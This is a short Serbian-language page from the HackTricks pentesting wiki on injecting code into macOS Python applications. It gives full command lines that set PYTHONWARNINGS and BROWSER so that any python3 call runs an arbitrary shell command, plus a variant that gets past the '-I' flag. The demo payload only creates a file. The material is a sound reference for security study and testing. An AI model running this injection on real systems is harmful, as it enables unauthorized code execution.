Serbian - Ht
HackTricks Training Twitter Linkedin Sponsor

macOS Python Applications Injection

Support HackTricks

Putem PYTHONWARNINGS i BROWSER env varijabli

Moguće je promeniti obe varijable okruženja da izvrše proizvoljan kod svaki put kada se pozove python, na primer:

# Generate example python script
echo "print('hi')" > /tmp/script.py

# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py

# RCE which will generate file /tmp/hacktricks bypassing "-I" injecting "-W" before the script to execute
BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py
Podržite HackTricks
PreviousmacOS Perl Applications InjectionNextmacOS Ruby Applications Injection

Last updated